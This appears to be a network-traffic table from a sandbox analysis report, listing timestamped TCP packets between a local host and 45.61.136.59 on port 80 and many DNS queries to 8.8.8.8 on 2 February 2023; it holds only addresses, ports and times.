                                                                                                                                            Feb 2, 2023 21:20:04.477533102 CET5000780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.542207956 CET5000780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.571950912 CET5000880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.707674980 CET805000745.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:04.708739996 CET5000780192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.743006945 CET805000845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:04.743246078 CET5000880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.746627092 CET5000880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:04.913995028 CET805000845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:04.914026022 CET805000845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:04.961885929 CET5000880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:05.685125113 CET5000880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:05.720942974 CET5000980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:05.852601051 CET805000845.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:05.855882883 CET5000880192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:05.885638952 CET805000945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:05.887516022 CET5000980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:05.888048887 CET5000980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:06.052588940 CET805000945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:06.052648067 CET805000945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:06.102492094 CET5000980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:06.169209957 CET5000980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:06.201021910 CET5001080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:06.334291935 CET805000945.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:06.335832119 CET5000980192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:06.365755081 CET805001045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:06.365900040 CET5001080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:06.367362976 CET5001080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:06.533704996 CET805001045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:06.533775091 CET805001045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:06.586942911 CET5001080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:06.989279985 CET5001080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:07.019520998 CET5001180192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:07.154273987 CET805001045.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:07.154383898 CET5001080192.168.2.445.61.136.59
                                                                                                                                            Feb 2, 2023 21:20:07.186969042 CET805001145.61.136.59192.168.2.4
                                                                                                                                            Feb 2, 2023 21:20:07.187100887 CET5001180192.168.2.445.61.136.59

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Feb 2, 2023 21:16:55.050714970 CET5968353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:16:55.313982964 CET53596838.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:58.169195890 CET6416753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:16:58.223357916 CET53641678.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:58.726520061 CET5856553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:16:58.749706984 CET53585658.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:59.283485889 CET5223953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:16:59.341532946 CET53522398.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:16:59.847026110 CET5680753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:16:59.866992950 CET53568078.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:00.414314032 CET6100753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:00.441862106 CET53610078.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:01.079452038 CET6068653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:01.098901033 CET53606868.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:01.693108082 CET6112453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:01.713701010 CET53611248.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:02.354043007 CET5944453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:02.400403023 CET53594448.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:02.968358994 CET5557053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:02.986113071 CET53555708.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:03.734210968 CET6490653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:03.762535095 CET53649068.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:05.823209047 CET5944653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:05.843189001 CET53594468.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:06.584966898 CET5086153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:06.604507923 CET53508618.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:07.113226891 CET6108853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:07.130682945 CET53610888.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:07.836095095 CET5872953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:07.855807066 CET53587298.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:08.518951893 CET6470053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:08.538374901 CET53647008.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:09.127360106 CET5602253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:09.148353100 CET53560228.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:09.879239082 CET6082253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:09.897906065 CET53608228.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:10.422660112 CET4975053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:10.442338943 CET53497508.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:11.122325897 CET6055053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:11.142081022 CET53605508.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:11.610620022 CET5485153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:11.628314972 CET53548518.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:12.272988081 CET5730053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:12.290879011 CET53573008.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:12.979702950 CET5452153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:12.997328997 CET53545218.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:13.614512920 CET5891453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:13.633780003 CET53589148.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:14.383872032 CET5141953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:14.401905060 CET53514198.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:14.996670961 CET5105453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:15.016834021 CET53510548.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:15.514900923 CET5567353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:15.532660007 CET53556738.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:16.047163010 CET4973553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:16.066742897 CET53497358.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:16.695384979 CET5243753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:16.715190887 CET53524378.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:17.344476938 CET5282553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:17.361974001 CET53528258.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:17.853440046 CET5853053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:17.871100903 CET53585308.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:18.347096920 CET6495953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:18.366899014 CET53649598.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:18.959134102 CET6309353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:18.976862907 CET53630938.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:19.869586945 CET5043353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:19.888969898 CET53504338.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:20.490375042 CET5349853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:20.509862900 CET53534988.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:20.976861000 CET6146053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:20.996846914 CET53614608.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:22.079495907 CET6300153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:22.100791931 CET53630018.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:22.771451950 CET6513353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:22.792406082 CET53651338.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:23.538954973 CET6099853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:23.558456898 CET53609988.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:24.215837955 CET6173353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:24.235260010 CET53617338.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:24.705131054 CET5337053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:24.722764969 CET53533708.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:25.266366959 CET6374653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:25.286178112 CET53637468.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:25.926310062 CET5062253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:25.944042921 CET53506228.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:26.424199104 CET6477353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:26.441790104 CET53647738.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:26.914838076 CET5981853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:26.934156895 CET53598188.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:27.492784977 CET4968453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:27.512058020 CET53496848.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:28.161072016 CET6322953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:28.178467989 CET53632298.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:28.959558010 CET5857653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:28.978854895 CET53585768.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:29.451267004 CET5404453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:29.469049931 CET53540448.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:30.100574017 CET5225953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:30.120381117 CET53522598.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:30.790383101 CET5388753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:30.808227062 CET53538878.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:31.324011087 CET5621853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:31.343502045 CET53562188.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:31.824964046 CET5009453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:31.842976093 CET53500948.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:32.429197073 CET5176653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:32.449278116 CET53517668.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:33.050224066 CET6152253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:33.069842100 CET53615228.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:33.617413044 CET5734953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:33.637011051 CET53573498.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:34.291446924 CET5396353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:34.310234070 CET53539638.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:34.771294117 CET5362253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:34.792144060 CET53536228.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:35.284569979 CET4960053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:35.302453995 CET53496008.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:35.766735077 CET5835553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:35.783725977 CET53583558.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:36.515197039 CET5760153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:36.534686089 CET53576018.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:37.010292053 CET6415953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:37.029347897 CET53641598.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:37.614087105 CET5992653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:37.631731033 CET53599268.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:38.121016979 CET6170953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:38.140654087 CET53617098.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:39.031106949 CET5918253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:39.048242092 CET53591828.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:39.720971107 CET6165753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:39.740279913 CET53616578.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:40.207515955 CET5001253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:40.226975918 CET53500128.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:40.837795019 CET5690453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:40.855664015 CET53569048.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.324842930 CET5151153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:41.344110966 CET53515118.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:41.794392109 CET5788953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:41.814143896 CET53578898.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.278362036 CET5848053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:42.298166990 CET53584808.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:42.752785921 CET5768253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:42.772540092 CET53576828.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.258919001 CET5407553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:43.276397943 CET53540758.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:43.731535912 CET4974653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:43.749233961 CET53497468.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:44.387408018 CET6194053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:44.407212973 CET53619408.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:44.871865988 CET5006553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:44.889273882 CET53500658.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:45.375560045 CET5357353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:45.393034935 CET53535738.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.147797108 CET6082853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:46.167370081 CET53608288.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:46.626087904 CET5967353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:46.645600080 CET53596738.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:47.184736013 CET6147053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:47.204088926 CET53614708.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:47.669491053 CET6183753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:47.686450958 CET53618378.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.194976091 CET5938553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:48.214471102 CET53593858.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:48.673832893 CET5570453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:48.691282988 CET53557048.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:49.362209082 CET5351153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:49.381771088 CET53535118.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:49.859575033 CET5053253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:49.877317905 CET53505328.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:50.423947096 CET5054553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:50.443409920 CET53505458.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:51.228626013 CET5528553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:51.248560905 CET53552858.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:51.703941107 CET6136953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:51.721074104 CET53613698.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:53.147264957 CET6541953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:53.166543007 CET53654198.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:53.630599976 CET5132053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:53.648770094 CET53513208.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.116086960 CET5721453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:54.133853912 CET53572148.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:54.609215021 CET6250953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:54.627095938 CET53625098.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:55.168179989 CET5989253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:55.187813997 CET53598928.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:57.054074049 CET5955453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:57.073162079 CET53595548.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.061589956 CET5987753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:58.081132889 CET53598778.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:58.569401026 CET6397053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:58.587802887 CET53639708.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:17:59.563241959 CET5066053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:17:59.582622051 CET53506608.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:00.081393003 CET5508853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:00.100474119 CET53550888.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:00.791280985 CET5680453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:00.810810089 CET53568048.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.281635046 CET6136653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:01.300815105 CET53613668.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:01.761099100 CET5353953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:01.778857946 CET53535398.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:02.612816095 CET6187653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:02.632424116 CET53618768.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.089128971 CET6004653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:03.106714010 CET53600468.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:03.598226070 CET6545553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:03.616486073 CET53654558.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:04.083024979 CET5114053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:04.102586031 CET53511408.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:04.722486019 CET4940753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:04.742147923 CET53494078.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:05.362410069 CET5146653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:05.381975889 CET53514668.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.033932924 CET5297753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:06.053174973 CET53529778.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:06.508181095 CET6161053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:06.525763988 CET53616108.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:07.395318031 CET6029153192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:07.413670063 CET53602918.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:07.872427940 CET5663753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:07.892153025 CET53566378.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:08.524291992 CET6400553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:08.544012070 CET53640058.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.025505066 CET5249653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:09.043183088 CET53524968.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.508091927 CET5427653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:09.527012110 CET53542768.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:09.981499910 CET5692353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:09.998792887 CET53569238.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:10.524434090 CET5843853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:10.541693926 CET53584388.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.001646996 CET5494553192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:11.021199942 CET53549458.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:11.482815027 CET5938053192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:11.502507925 CET53593808.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:12.006372929 CET6060253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:12.026077032 CET53606028.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:12.544226885 CET6418953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:12.563680887 CET53641898.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:13.473978996 CET6008853192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:13.492031097 CET53600888.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:14.152349949 CET6531253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:14.174494982 CET53653128.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:14.634895086 CET5754953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:14.654848099 CET53575498.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:15.346041918 CET5619353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:15.365820885 CET53561938.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:15.823925018 CET6461753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:15.843082905 CET53646178.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:16.299076080 CET5083653192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:16.316849947 CET53508368.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:16.781172991 CET6064953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:16.798206091 CET53606498.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:17.426433086 CET6183753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:17.443949938 CET53618378.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:18.359124899 CET6075253192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:18.377084970 CET53607528.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:18.846774101 CET5347453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:18.866209030 CET53534748.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:19.325022936 CET5701953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:19.344228029 CET53570198.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:19.809020996 CET5942353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:19.828419924 CET53594238.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:20.293732882 CET5273353192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:20.311455965 CET53527338.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:20.928692102 CET5408753192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:20.946599007 CET53540878.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:21.709866047 CET5447953192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:21.729360104 CET53544798.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:22.180458069 CET5341453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:22.200498104 CET53534148.8.8.8192.168.2.4
                                                                                                                                            Feb 2, 2023 21:18:22.662606955 CET5827453192.168.2.48.8.8.8
                                                                                                                                            Feb 2, 2023 21:18:22.682085037 CET53582748.8.8.8192.168.2.4
